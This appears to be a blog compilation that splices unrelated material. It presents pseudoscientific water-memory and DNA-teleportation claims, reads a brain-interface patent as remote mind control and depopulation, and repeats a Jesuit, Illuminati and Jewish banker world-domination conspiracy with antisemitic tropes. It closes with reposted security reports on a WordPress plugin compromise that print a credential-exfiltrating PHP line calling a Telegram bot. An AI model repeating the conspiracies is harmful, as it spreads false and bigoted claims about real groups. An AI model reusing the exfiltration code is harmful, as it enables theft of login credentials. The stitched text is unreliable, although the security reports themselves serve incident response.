„Water Memory (2014 Documentary about Nobel Prize laureate Luc Montagnier) 1.267.501 Aufrufe•Am 28.01.2016 veröffentlicht“
„The Road is full of obstacles and he can only rely on himself with no back-up…“
„I am a non-conformist, I am outdated, just like a good old Whisky, because I am working on a red-hot issue. (Luc
Montagnier)“
„Professor Monagnier is first of all a medical doctor, a pragmatist.“
„You are banned. (Luc Montagnier)“
„If the results fit with the norm I am considered a good scientist, ..if the results are deviant from the actual
norm, I am considered a misfit, the system is sick, I am not.“
„He might have discovered the HIV, but he´s outdated. (Luc Montagnier)“
„But that is completely wrong, these are my best years in Research, I find the most important phenomena today.
It´s good to discover a Virus, but to find the mechanisms of life that is even more important. (Luc Montagnier)“
„Professor Montagnier might nothing have nothing more to lose.“
„What is not normal that people were so mean with such a high level researcher, all the same he died from it. I am not saying anyone killed him, but I mean there came a time where he could not bear the situation he was in. (Franck Nouchi) (Journaliste for Le Monde)“
„It´s one thing to criticize and another to assassinate someone almost physically. He was the Galilee of the 21st century, I think he would have been burned at the stake for his theories in the 17th century. (Luc Montagnier)“
„Je ne suis pas Galilée. (Jacques Benveniste)“
„Jacques Benveniste (* 12. März 1935 in Paris; † 3. Oktober 2004 ebenda) war ein französischer Mediziner.
Leben
Jacques Benveniste arbeitete bei dem Institut national de la santé et de la recherche médicale (INSERM), dem französischen Gesundheits- und Forschungsinstitut, und wurde 1984 zum Direktor der Forschungsabteilung dieses Instituts ernannt. 1970 entdeckte er den „Plättchenaktivierenden Faktor“ (PAF), einen Wachstumsfaktor im
Zusammenhang mit Angiogenese.
https://de.wikipedia.org/wiki/Jacques_Benveniste“
„The Transduction Experiment…Starting with the DNA of an HIV-infected patient, he will create a digital file, sent it through the internet to another lab (Italien) where the DNA will be reconstituted from the digital file by another Lab. The Professor calls it transduction, but we could almost call it Teleportation.“
„A DNA carries all the genetic information necessary for any organisms development and functioning. It´s true for a man, for a mushroom or a bacteria. Each DNA is unique and it allows to identify each organism just like an ID-Card, therefore we will be able to compare the DNA reconstituted several 100s of Kilometres of way with the Professors DNA stored in his fridge.“
„Eine DNA enthält alle genetischen Informationen, die für die Entwicklung und Funktion von Organismen erforderlich
sind. Es gilt für einen Mensch, für einen Pilz oder für ein Bakterium. Jede DNA ist einzigartig und ermöglicht es,
jeden Organismus zu identifizieren, Wie bei einem Personalausweis, daher können wir die DNA mit der vergleichen, die mehrere 100 Kilometer entfernt wieder hergestellt/rekonstitutiert wurde, mit der DNA des Professors, die er in seinem Kühlschrank aufbewahrt. “
„In einem Interview für den Film House of Numbers (2009) behauptete Montagnier, dass eine gesunde Ernährung, Antioxidantien und Hygiene im Kampf gegen AIDS wichtiger seien als einschlägige Arzneimittel. Ein gesundes Immunsystem, gestärkt durch eine gesunde Ernährung bzw. Lebensweise, soll seiner These nach in der Lage sein, das HI-Virus ohne Medikamente restlos zu beseitigen. Diese Aussage widerspricht der bisherigen Ansicht, dass AIDS mit den heute zur Verfügung stehenden Mitteln nicht geheilt werden kann.
Im Juli 2010 stellte Montagnier auf einer Konferenz eine neue Methode zum Nachweis von Virusinfektionen vor. Er behauptete, Lösungen, die die DNA krankheitsauslösender Bakterien und Viren wie HIV enthielten, seien in der Lage, niederfrequente Radiowellen auszusenden, die die umgebenden Wassermoleküle veranlassten, sich in Nanostrukturen zu ordnen. Diese Wassermoleküle könnten auch ihrerseits wiederum Radiowellen aussenden. Wasser behalte diese Eigenschaften auch dann, wenn keine Virus- oder Bakterien-DNA mehr nachweisbar sei. Ärzte könnten die Radiowellen verwenden, um Krankheiten zu erkennen. Montagniers Behauptungen sind wegen ihrer angeblichen Nähe zur Wassergedächtnislehre der zeitgenössischen Homöopathie stark umstritten.Montagnier ist der Meinung, die COVID-19-Pandemie sei in einem Labor von Menschen verursacht worden, worauf das unnatürliche Vorhandensein von HIV-Elementen und Malariakeimen im Genom des neuen Coronavirus SARS-CoV-2 hindeute.“
https://de.wikipedia.org/wiki/Luc_Montagnier
Kategorie: Alliance/Ermächtigung/Empower
-
Water Memory & Pentagon Bioweapons & NWO Cancer Mafia
-
US DoD Patent Remote BCI – Brain Computer Interface Patent # 6011991
„REMOTE NEURAL MONITORING & BRAIN MAPPING“
„US DoD Patent Remote BCI – Brain Computer Interface“
„Patent # 6011991 Explained
US DoD Patent Remote BCI explained.“
„POSTED BY: DJ JANUARY 13, 2016“
„Part 2
PATENT 6011991 Remote Brain Computer Interface – Neural Monitoring (RNM) 01.04.2000
ABSTRACT: A system and method for enabling human beings to communicate by way of their monitored brain activity.
This is artificial telepathy.
The brain activity of an individual is monitored and transmitted to a remote location (e.g. by satellite). At the remote location, the monitored brain activity is compared with pre-recorded normalized brain activity curves, waveforms, or patterns to determine if a match or substantial match is found.
I can see this going to EDGING the human nodes on the network, as well as going to the ABI data being collected – going to thought based activity – for mapping & mastering the Human Domain.
If such a match is found, then the computer at the remote location determines that the individual was attempting to communicate the word, phrase, or thought corresponding to the matched stored normalized signal.
If this technology’s employed in GeoINT you won’t even have the privacy of your own thoughts. Again, I don’t think this technology was funded, developed and patented for government and military use to sit on a shelf somewhere collecting dust.
DESCRIPTION: This invention relates to a system and method for enabling human beings to communicate with one another by monitoring brain activity. In particular, this invention relates to such a system and method where brain activity of a particular individual is monitored and transmitted in a wireless manner (e.g. via satellite) from the location of the individual to a remote location so that the brain activity can be computer analyzed at the remote location thereby enabling the computer and/or individuals at the remote location to determine what the monitored individual was thinking or wishing to communicate.
In certain embodiments this invention relates to the analysis of brain waves or brain activity, and/or to the remote firing of select brain nodes in order to produce a predetermined effect on an individual.
This is remote mind control – MK Ultra directed not necessarily by human handlers, but by a computer system that sits on a GIG in a network centric environment. They can not only monitor your thoughts but they can modify your behavior remotely.
SUMMARY OF THE INVENTION
Generally speaking, this invention fulfills the above described needs in the art by providing a method of communicating comprising the steps of:
1. providing a first human being at a first location; This would be the equivalent of your patient zero or target node on the network.
2. providing a computer at a second location that is remote from the first location; This would be the GeoINT A.I. System on the GIG
3. providing a satellite; This would be the ’space‘ component of the domain on the GIG
4. providing at least one sensor (preferably a plurality–e.g. tens, hundreds, or thousands, with each sensor monitoring the firing of one or more brain nodes or synapse type members) on the first human being; This ties into the remote nano sensing devices discussed in the previous GeoINT symposiums and papers.
5. detecting brain activity of the first human-being using the at least one sensor, and transmitting the detected brain activity to the satellite as a signal including brain activity information; Once you’re a human node on a geo spacial intelligence network with a unique BioAPI or network identifier, this is a piece of cake for them.
6. the satellite then sending this signal including the brain activity information to the second location; Or in other words, down to the GIG for processing.
7. a receiver at the second location receiving the signal from the satellite and forwarding the brain activity information in the signal to the computer; I’ve discussed how the HTA tool and the A.I. Programs being developed for Identifying the signal in the noise….this brain mapping technology goes to that aspect of GeoINT.
8. comparing the received brain activity information of the first human being with normalized or averaged brain activity information relating to the first human being from memory; and This goes to mapping individual human nodes for normalcy patterns, from a telepathic ABI standpoint, by way of mapping the human brain activity casting a neural net over humanity.
9. determining whether the first human being was attempting to communicate particular words, phrases or thoughts, based upon the comparing of the received brain activity information to the information from memory. If it can distinguish ‚reminiscing thought‘ from present time/space activity communication of words, phrases or thoughts, this technology can, in essence, determine intent – before the action is executed by “the first human being” Can you imagine the massive implications of this technology layered on to the A.I. Core of the GeoINT network system.
In certain embodiments, the invention includes the following step: asking the first human-being a plurality of questions and recording brain activity of the first human-being response, to the plurality of questions in the process of developing said normalized or averaged brain activity information relating to the first human-being stored in the memory. A database in a memory may include, for each of a plurality (e.g. one hundred or thousands) of individuals, a number of prerecorded files each corresponding to a particular thought, attempt to communicate a word, attempt to communicate a phrase or thought, or a mental state.
This goes to the JADE II and GeoINT’s ability to detect and read emotions.
Measured brain activity of a given individual may be compared to files from that database of that individual to determine what the individual is attempting to communicate or what type of mental state the individual is in.
This capability we discussed within the GeoINT context goes to “Answering questions before they’re asked”.
In certain embodiments, the plurality of questions are the same question.
In certain embodiments, the plurality of questions are different questions.
Both of these statements absolutely go to the dichotomy discussed in episode 309 with JB Well on Caravan to Midnight regarding data neutrality and sequence neutrality.
In certain embodiments, the invention includes the step of normalizing or averaging recorded brain activity responsive to a given question or set of questions in developing the normalized or averaged brain activity information relating to the first human being.
It is an object of this invention to enable brain activity of a first human being to be monitored, with the activity being transmitted to a remote location so that individuals and/or a computer at the remote location can determine what the first human being was thinking or intending to communicate. In such a manner, human beings can communicate with one another via monitoring of brain activity, and transmission of the same.
In the grand scope of things, this is not synthetic telepathy for humans to communicate with other humans, this is the ability to read or map brain functions and send that information to a machine for processing and interpretation for an actionable response – by the AI system.
It is another object of this invention to communicate monitored brain activity from one location to another in a wireless manner, such as by IR, RF, or satellite. In other words over the domain of land, air and space.
It is another object of this invention to provide a system capable of identifying particular nodes in an individual’s brain, the firings of which affect characteristics such as appetite, hunger, thirst, communication skills (e.g. which nodes are utilized to communicate certain words such as „yes“, „no“, or phrases such as „I don’t know“, „I’m not sure“, or numbers such as „one“, „two“, „ten“, „one hundred“ and the like), thought processes, depression, and the like. When such nodes are identified, they may be specifically monitored by one or more sensors to analyze behavior or communication or words, phrases, or thoughts. In other embodiments, devices mounted to the person (e.g. underneath the scalp) may be energized in a predetermined manner or sequence to remotely cause particular identified brain node(s) to be fired in order to cause a predetermined feeling or reaction in the individual, such as lack of hunger, lack or depression, lack or thirst, lack of aggression, lack of alzheimer’s disease effects, or the like.
The ‚devices mounted to the person‘ can be wetware or wearable tech. The remotely transmitted neural stimulation can also trigger the exact opposite of the predetermined feelings and reactions mentioned – – fear, depression, aggression, anxiety. How about pain? That has serious implications stemming from the complete blocking of, or the inducement of this sensation remotely.
Brain node firings are the basis of thought and mind processes of individuals. Certain embodiments of this invention enable such brain firings and behavior to be captured by an external device. It is an object of this invention to utilize a normalization or normalizing curve (or waveform or pattern) based upon monitored brain activity to detect or determine thought processes by the monitored individual. In such a manner, individuals can transmit by satellite what they are thinking or intending to think via their monitored brain activity, without the need to talk or write down information.
Each individual has a distinct pattern of brain node firings or brain activity. Each person is believed to be different in this regard. Thus, a separate brain activity file may be stored in a memory for each individual, and analyzed or compared to received brain activity from the monitored individual in order to determine what that individual is thinking or attempting to communicate.
This also goes to creating a unique bio identifier for each human network node based on their individual, unique brain activity signature. This also goes to cataloging and establishing ’norms‘ based on an individuals brain activity in addition to the mind reading capability identified here.
It is an object of this invention to utilize brain monitoring and transmission of monitored brain activity for lie detection and/or human communication.
In my video reports entitled “GeoINT, Casting a Neural Net on Humanity” and “The History of JADE II: Planetary Conquest By a Global AI Warfare System”…I explained how this AI technology would be able to “read” if a person’s telling the truth or lying by the interpretation of body language, voice intonations and facial expression and make a determination for a course of action.
It is another object of this invention to formulate or build-up a file for each individual based upon patterns recorded in response to that individual answering or responding to numerous predetermined questions with known intended responses. Subsequently, monitored brain activity from that individual may then be compared to information stored corresponding to that individual to determine whether the individual is lying or what the individual is intending to communicate in the monitored brain activity. The higher the level of detail of the file, the higher the level of potential communication by certain embodiments of this invention.
At least one sensor on the scalp or skin in certain embodiments provides signals representative of physiological activity generated in the brain of a monitored individual. A data acquisition device receives the signals representative of the physiological activity generated in the monitored brain, and transforms the signals into a pattern or curve corresponding to the monitored brain activity. This is then transmitted (e.g. by satellite) to a computer located at a remote location, with the monitored brain activity pattern or curve being stored in a memory at the remote location. The computer then causes the received pattern or curve information to be compared with stored brain activity pattern information relating to the monitored individual in order to determine (a) whether the monitored individual is lying in response to a particular question, or (b) what the monitored individual is communicating or attempting to communicate.
They have the capability and now with the GIG in conjunction with GeoINT, to reduce humanity to the sum total of the data collected on each human network node. Not only that, your every activity, transaction, communication and yes, even your inner most personal thoughts will be cataloged and uploaded to a hive based AI system on a network centric GIG.
Another object of this invention is to utilize normalization curves representative of received brain activity patterns from the monitored individual, and to compare the received normalized data with normalized brain activity pattern or curve data stored in memory relating to that individual. The use of normalization curves in one or both of the individual’s file and received brain activity improves reliability, accuracy, and efficiency.
In certain embodiments of this invention, the computer located at the remote location includes a neural network suitably programmed in accordance with known neural network techniques, for the purpose of receiving the monitored brain activity signals, transforming the signals into useful forms, training and testing the neural network to distinguish particular forms and patterns of physiological activity generated in the brain of the monitored individual, and/or comparing the received monitored brain activity information with stored information relating to that individual in order to determine what the individual is attempting to communicate.
Again, this goes to the already know capabilities of the JADE II system and GeoINT and expands on those capabilities using remote command and control aspects of MK Ultra.
This invention further fulfills the above described needs in the art by providing a method of affecting a mental or physiological state of an individual, the method comprising the steps of:
1. providing at least one firing device capable of being energized on an individual; and
2. energizing the firing device to cause the firing device to cause a particular or group of brain nodes to be fired in the individual in order to affect the mental or physiological state of the individual.
Again, The “device” being referred to can be wetware, wearable tech or directed signal transmission in the form of RF, FM, microwave, ELF or electromagnetic.
3. In certain embodiments, the method including the step of providing at least one firing device on or under the scalp of the individual in proximity of the brain of the individual.
4. In certain embodiments, the method including the step of identifying at least one brain node related to the mental or physiological state intended to be affected, targeting the identified brain node, and energizing the firing device or devices to cause the identified node to be fired in order to affect the mental or physiological state of the individual.
This is among other diabolical applications remote behavior modification prior to the perceived behavior being acted out.
5. In certain embodiments, the method is utilized to cause the individual to be one of less hungry, less thirsty, less anxious, and less depressed.
Or, as I previously pointed out, it can be used to cause the exact opposite. To what end is served by making a person or population who are starving ’not feel hungry‘? Or a population in a region with no access to water to feel ’not thirsty‘. The proponents of global dominance, of one world order of Mastering the Human Domain and the technology that will be used to accomplish this agenda are not benevolent. My question is, will this technology be used to euthenise individuals or entire population centric regions? I don’t know the answer and we can all speculate, but one thing’s for sure, this technology has the capability to identify, target and eliminate people on many levels.
6. In certain embodiments, the remote node firing devices are electrically energized and generate electromagnetic waves which cause a plurality of brain nodes to be fired.
One thing we know for certain, we are bio electrical in nature – we are frequency based beings and the disruption, interference or manipulation of these frequencies can have devastating and dire effects on us.
Research Links:
Remote Neural Monitoring Oregon State Hospital
President’s Commission for the Study of Bioethical Issues letter to respondent 07.27.2011
Patent # 003951134 Distant Brain Reading & Brain Wave Manipulation 4.10.1976
Patent # 6011991 Communication system and method including brain wave analysis and/or use of brain activity 01.04.2000
Patent # 6470214 USAF RF Hearing Effect for skull/tissue penetrating sound
Patent # 6587729 Similar to Patent # 6470214″
Source: https://www.level9news.com/US-DoD-Patent-Remote-BCI/
Further References:
https://www.lens.org/lens/patent/US_6011991_A
https://patents.google.com/patent/US3951134
https://patents.google.com/patent/US6470214
Apparatus for audibly communicating speech using the radio frequency hearing effect
„Additional Info:
Scientists planning to upload brain to computer
Downloading your brain
Transcendence: Resurrecting the Dead Using Post Mortum Brain Maps
Remote MK Ultra Patents – Using RNM
OBAMA’s B.R.A.I.N. Initiative“
„For Science or Servitude?
Obama’s BRAIN Initiative taps into many nefarious areas as you will see. However, it also provides a method to control the evolution of humanity or possibly, even de-evolution of mankind through the total command and control of the short term future of humanity. We are on the threshold of the AI singularity event horizon.“
„Research Links:
White House – Brain Initiative – Interesting info and collaborators 9.30.2014
White House Brain Initiative 4.02.2013
BBN Synthetic Biology 9.05.2012
How to Turn Living Cells Into Computers 2.13.2013
The Human Connectome Project 03.20.2015
Synberc – Synthetic Biology
Brain Computing 2.23.2015
NIH The Brain Initiative 8.19.2015 Link to Brian 2025 – Final report)“
https://www.level9news.com/transcendence-resurrecting-the-dead/
„Transcendence: Resurrecting the Dead Using Post Mortum Brain Maps
Transcendence resurrecting the dead POSTED BY: DJ JANUARY 19, 2016 / Published December 17, 2015“
„In the quest for eternal life, tech giants like Google are exploring ways to extend human life by hundreds if not thousands of years. HumaiTech is an L.A. based AI company which is looking to take this quest for immortality a step further by transferring the minds and personalities of the dead into an artificial neural network and then downloading it into an artificial body, or cybernetic humanoid unit.“
https://www.level9news.com/transcendence-resurrecting-the-dead/
https://www.dailymail.co.uk/sciencetech/article-2879803/The-scientists-planning-upload-brain-COMPUTER-Research-allow-inhabit-virtual-worlds-live-forever.html -
Vatican Secret Societies Jesuits and the New World Order
„Vatican Secret Societies Jesuits and the New World Order
558.511 Aufrufe•Am 02.10.2017 veröffentlicht“
„The Pope is a Monarch….according to various books.. The Pope is the Monarch of the World…Not just a religious leader, he is actually a political leady…The actual name Vatican I found very interesting. It actually means: Worship of the divine serpents…so we find the very basis of the Vatican, the very word itself means the Worship of Serpents.“
„Anti-White racists…who is another high level Freemason.. So we have all these high level masonics black and white…working together for agitation… We need to understand that these people have died to their own self-will…Something that Christians should, it is the way we should be, we have no life anymore, our life is root dead without Christ…we need to learn to die to ourselves…Our only purpose is to do the will of our master and when he is finished with us, he let us die…and so they have completely emptied their own personalities…they will do exactly what they are told. There is no such thing as a disobedient Jesuit. They are in the order enshriveled for 15 Years, they are soldiers, They murder Marine Corps in the Marines. The Marines were fashioning out for the Jesuit Order…you break them in the Boot Camp, you rob them of their personality, you shave his head, you put them all the same clothes on, they all are treated the same, they are treated like dirt, we rob you of your will, so that we can mold you like we want to, that is all Jesuit. So this is how they thing…They are all under orders, this is why you can have no country with a Jesuit Presidents in, they have to be exposed and all their Agents that they work through must be exposed and this is exactly what Zar Alexander the first did in 1820. He kicked out all Jesuits out of Russia..In 1822 he shut down all Masonic Lodges. In 1825 he was poisoned, so this is the Jesuit Mindset.“
„Bankers. The house always wins…It´s already there in their Canon Law, it´s okay to steal, the whole world is their candy shop, where they can steal everything they can get their hands on…If that means killing Kings or sinking ships, causing their own deaths, they are doing it „for the greater glory of god“…“
„The First Front Group the Jesuits used was called the Illuminati…by a Jesuit Professor..Weishaupt…in reality Weishaupt never left the order…Red Shields become the Bankers for the Jesuit Order, doing the upheaveal..so this Alliance between the Jesuits and the House of Rothschilds, high level masonic jews is very important to realize at this point, because we have to live with it and deal with it today and also Bavaria is the Stronghold of Jesuits..there is a huge inquisition and torture chamber there in Nuremberg.“
„The Jesuits created the Illuminati…“
„It is therefore no one wonder that the vengeful eye of the Jesuits was focussed on George Washington.“
„1799..From the onset of his illness…the symptoms leading up to Washingtons death were difficulty in breathing, tightness of the throat and burning pain. Washington was only 67 Years old when he died.“
„What many fail to understand is that Marxism was based on the Jesuit Slave Plantations.. in South America. And Sir Thomas Mores Book Utopia…“
“What the Jesuits did was..they were the Master of Communism…Sir Thomas More is the Author of Utopia. Utopia is
the foundation for Communism, so Communism is Roman..They run on Communist principles of universal equality..So therefore Communism is a brainchild of the Jesuits, but it has bee made to look to be jewish through implementing it through Marx and his communist manifesto.”
„The Archbischop completely controls all the Corporations in this Country…the Jesuits created a Dictatorship.“
„Wallstreet..“ „Money for this young revolutionary also came from indutrialists in the west..Hitler rise to power was financed by London and New York and Berlin. They were the Knights of Malta running the Bank Institutions of the World.“
„Thule Society…These evil organizations that perpetrate the ugly things that these criminals are doing in this country for which they must be held accountable…The American Branch of the Illuminati was called Skull & Bones and has its headquarters at CIA recruting ground Yale University…Bush was a member as was his grandson…are under and have been under control of the Jesuits for decades..Hitler did not write the book.“
„The Vatican had not been punished for these crimes.“
„Many Newspapers were also under Rome´s control.“
„Churches have always been tax-exempt.“
„All the churches by 1981 were completely taken-over…What is the ultimate goal of the papacy?… the answer is domination of the World. The Vatican is seeking a new world government or new world order.“ -
Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird
„Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird“
Conspiracy Revelation: 28.9.2020: Linguistische Korrektur..
„Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird
durch HTH_Editors | September 11, 2020 | 0 Kommentare WordPress Plugin, WordPress-Sicherheit
Sicherheitsforscher haben kürzlich eine Sicherheitsanfälligkeit in einem Dateimanager-Plugin gemeldet, was anfangs mehr gefährdete als 700,000 WordPress-Sites. jedoch, in ein paar Tagen, die Anzahl der angegriffenen Standorte erreicht 2.6 Million.
Mehrere Angreifer, die die Sicherheitsanfälligkeit des Dateimanager-Plugins ausnutzen.
Laut Wordfence Forscher sind mehrere Bedrohungsakteure Schuld für diese Angriffe. Zwei spezifische Bedrohungsakteure sind bei den Exploits am erfolgreichsten. Es scheint, dass diese Angreifer jetzt Kennwörter schützen, das anfällige Kopien einer bestimmten Datei schützt…
Der aktivste dieser Angreifer wurde als “Bajatax” identifiziert. Das Unternehmen hat zuvor Anmeldeinformationen von PrestaShop-Websites gestohlen. Zu den von den Forschern entdeckten Kompromissindikatoren gehören einfache Dateien, die die “Bajatax” Zeichenfolge beinhalten und Änderungen an der ursprünglichen anfälligen Datei connector.minimal.php durrchführt. Die letztere Datei soll alle anderen potenziellen Angreifer ausschließen. Die Forscher-Entdeckungen weisen darauf hin, dass diese Dateien von einigen der aktivsten IP-Adressen verwendet werden, die bei den Angriffen eingesetzt wurden.
Infizierten Websites wird bösartiger Code hinzugefügt. Dieser Code verwendet die API von Telegram, um die Anmeldeinformationen aller Benutzer zu filtern, die sich bei der gefährdeten Site anmelden. In Ergänzung, Der gleiche Code wird auch zur Datei user.php hinzugefügt, bei der es sich um eine WordPress-Kerndatei handelt.
Der zweite Angreifer, der die Sicherheitsanfälligkeit des Dateimanagers mit großem Erfolg ausnutzt, lässt einen bestimmten Infektor fallen,..index.php, mit einem MD5-Hash … und eine von diesem Infektor eingefügte Hintertür. Wordfence sagt im offiziellen Bericht. Dieser Angreifer schützt auch die Datei … mit einem Kennwort, um zu versuchen, andere Bedrohungsakteure auszusperren.
Die Forscher skizzieren auch, dass die von diesem zweiten Schauspieler verwendete Hintertür seit vielen Jahren verwendet wird. jedoch, Mehrere Kopien davon können auf eine einzelne infizierte Site verteilt werden, Dies führt zu Persistenz, wenn kein Schutz vorhanden ist.
Außerdem, Sobald die Hintertüren erfolgreich installiert wurden nutzt der Angreifer sie sicherlich, um weitere Änderungen an den WordPress-Kerndateien vorzunehmen.
Was sollten Sie tun, wenn Sie eine anfällige Version des Dateimanager-Plugins verwendet haben??
Der beste Sicherheitshinweis ist die Verwendung eines Sicherheitstools zum Scannen Ihrer Website nach Malware. Falls Sie feststellen, dass Ihre Website durch die in diesem Artikel beschriebenen Angriffe gefährdet wurde, sollten Sie in Betracht ziehen Ihre Website zu bereinigen, bevor Sie etwas anderes tun.
Wenn Sie Eigentümer einer E-Commerce-Website sind, sollten Sie auch alle Ihre Benutzer kontaktieren, Lassen Sie sie wissen, dass Ihre Anmeldeinformationen möglicherweise kompromittiert wurden. Sie können die Gesamtsicherheit ihrer Website auch anhand der Tipps testen, die wir im folgenden Artikel bereitgestellt haben:
Lesen Sie auch So testen Sie die Sicherheit Ihrer WordPress-Site“
Quelle: https://howtohosting.guide/de/attacks-against-sites-running-vulnerable-file-manager-plugin/ -
WordPress malware using the Telegram API
„WordPress malware using the Telegram API“
„Panos Kesisis · 01st September 2020·Wordpress, PHP, Website Security“
Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…
„wp_ajax_try_2020_v2“
„file_get_contents(„https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=“ . urlencode$“
„The malware looks to be infecting WordPress‘ core files, „File Manager“ and „WooCommerce“ plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:
wp-includes/user.php
wp-admin/admin-ajax.php
wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
woocommerce/includes/wc-user-functions.php
woocommerce/includes/class-wc-form-handler.php
Expressions that can help to determine if your site is compromised are:
„bajatax“
„api.telegram.org“
Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.
Steps to resolve
Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.
Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).
Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.
…
Source: https://fixed.net/blog/wordpress-malware-using-the-telegram-api -
Attackers Fight for Control of Sites Targeted in File Manager Vulnerability
„Attackers Fight for Control of Sites Targeted in File Manager Vulnerability“
Conspiracy Revelation: 28.9.2020: Wordfence caused a long time a WSOD on my page…not sure if it was a counterdefense mechanism of these notorious russian cleptocratic cyberhack spambot mafiosis, that dominate the Internet for the last 25 years with their viral loads… I will check that soon…I surely would have used wordfence if it didn´t lose compatibility aka WSOD which made it impossible for me to use it at a certain point in time with this webpage.
These ico exploits are very old and typical russian cyber mafiosi method. At least 20 years old, also for Windows Systems.
Update: I installed Wordfence now, it works again, the white screen of death was likely caused by these russian cyber mafiosis as a Malware Persistence Factor, so that their exploit could survive longer, that is a good indicator that the page is finally really cleansed from this filth.
„This entry was posted in Research, Vulnerabilities, WordPress Security on September 10, 2020 by Ram Gall 5 Replies
Last week, we covered a vulnerability in the File Manager plugin installed on over 700,000 WordPress sites. By Friday, September 4, 2020, we recorded attacks on over 1.7 million sites, and by today, September 10, 2020 the total number of sites attacked has increased to over 2.6 million. We’ve seen evidence of multiple threat actors taking part in these attacks, including minor efforts by the threat actor previously responsible for attacking millions of sites, but two attackers have been the most successful in exploiting vulnerable sites, and at this time, both attackers are password protecting vulnerable copies of the connector.minimal.php file.
An early bird stealing passwords
Our site cleaning team has found numerous indicators that the most active of these attacks are the work of a Moroccan threat actor known as “bajatax” which has historically stolen credentials from PrestaShop sites. These indicators include simple files containing only the string “bajatax” as well as modifications to the original vulnerable connector.minimal.php file designed to lock out all other attackers, containing a $content=“by bajatax” line of code. Logs from infected sites indicate these files are being added by some of the most active attacking IPs, and we were able to verify that this threat actor is behind the hardfork.php and hardfile.php IOCs mentioned in our initial post. This attacker was the first to attack this vulnerability at scale.
Once a site is infected, the “bajatax” attacker adds malicious code that uses the Telegram messenger’s API to exfiltrate the credentials of any user logging into the site. This code is added to the WordPress core user.php file. If WooCommerce is installed, the wc-user-functions.php and class-wc-form-handler.php files will also be modified to exfiltrate user credentials. These credentials could then be resold or used to gain access to other accounts using the same credentials.
We’ve found IOCs from this threat actor on a substantial number of sites. Despite this attacker’s efforts to lock out other hackers, they haven’t always managed to get their foot in the door first, but we’ve seen them make regular attempts to update the passwords on both the vulnerable connector.minimal.php file and on other files they’ve added to allow additional upload capability, while leaving the credential scraping functionality in place which consistently sends to the same Telegram chat ID of 1110165405.
Our Threat Intelligence team has been hard at work adding malware signatures to detect Indicators of Compromise by the bajatax threat actor, and these have been available to Wordfence Premium users starting September 8, 2020. These signatures will be released to sites still using the free version of Wordfence after 30 days, starting October 8, 2020.
A second attacker scattering backdoors
The most prevalent single indicators of compromise we found are an infector, feoidasf4e0_index.php, with an MD5 hash of 6ea6623e8479a65e711124e77aa47e4c, and a backdoor inserted by this infector. In this case we are providing the MD5 hash since this file is extremely consistent, and as such the MD5 can be a useful indicator of compromise.
This attacker is using the mkfile method outlined in our initial article rather than the upload method favored by the “bajatax” threat actor. This attacker is also adding password protection to the vulnerable connector.minimal.php file in an effort to lock out other attackers, though our attack data indicates this threat actor is using a consistent password.
The feoidasf4e0_index.php file inserts two copies of the second backdoor with randomized filenames ending in _index.php whenever it is accessed. One copy is placed in the webroot, and one in a randomized writable folder on the site. Both backdoors have the same MD5 of 3f60851c9f7e37c0d8817101d2212c68. While the backdoor in question has been in use for several years, the fact that multiple copies might be scattered across an infected site would help this attacker maintain persistence in the absence of a thorough scanning solution. We’ve also seen additional copies of this backdoor with different MD5 hashes added by this attacker; these are simply the most common variants.
Once these backdoors are in place, the attacker is using them to make additional modifications to core WordPress files, in some cases by using obfuscated code to include separate backdoors disguised as .ico files. While the prevalence of the feoidasf4e0_index.php file appears to be declining, the secondary backdoors added by this file are still extremely common, indicating that this attacker has managed to achieve some degree of persistence.
The feoidasf4e0_index.php file itself appears to be a very slightly modified version of an infector used in previous campaigns that primarily added cryptominers and SEO spam to various sites, so these are viable monetization routes for this threat actor, though they could also simply lease access to a botnet of infected sites under their control.
Other actors abound
Our site cleaning team has cleaned a number of sites compromised by this vulnerability, and in many cases, malware from multiple threat actors is present. The aforementioned threat actors have been by far the most successful due to their efforts to lock out other attackers, and are collectively using several thousand IP addresses in their attacks. Nonetheless, we’ve seen attacks against this vulnerability from over 370,000 separate IP addresses.
There has been almost no overlap between the IPs adding and accessing the feoidasf4e0_index.php file and the IPs adding and accessing the bajatax “hardfork” files. The single exception is the IP 51.83.216.204, which appears to be a third party opportunistically checking for the presence of both of these backdoors and then attempting to add a backdoor of its own, without much success. As more and more users update or remove the File Manager plugin, control of any infected sites will likely be split between these two threat actors.
Conclusion
In today’s article, we discussed the most common infections we’re seeing on sites where the File Manager vulnerability has been exploited as well as the predominant actors involved. We’ve also managed to link at least one of the attackers to a known threat actor and determine likely paths to monetization. If you or anyone you know has had a vulnerable version of the File Manager plugin installed, we urge you to scan your site for malware using a security solution such as Wordfence. If your site has been compromised by the “bajatax” threat actor, it is critical that you completely clean your site before contacting all of your users and advising them that their credentials may have been compromised, especially if you are running an e-commerce site.“
„Some Agency September 10, 2020 at 2:42 pm:
For that telegram chat room 1110165405 I deleted their webhook using the telegram API once I found out one of our clients sites was hacked. Hoping I helped the cause a little there lol. The index file found on this server was ‚fqsvoig675_index.php‘ and they injected code into ‚user.php‘ to send user creds to their telegram bot.
https://api.telegram.org/botXXXXXXXX:XXXXXXX/deleteWebhook?chat_id=1110165405“
„Surender September 10, 2020 at 8:58 pm:
I am feeling lucky that I have been using Wordfence since beginning. It has always protected me from such attacks.
Thank you Wordfence team.“
„bloganchoi September 13, 2020 at 6:09 pm:
File managers are very important, if you install an unknown plugin that is susceptible to critical vulnerabilities that lead to your website being hacked, be careful when installing any plugin on your site.“
„Juan Erazo September 10, 2020 at 1:14 pm:
That’s right. Our site suffers this attack the las week and only yesterday we are online again. We are using wordfence from now!“
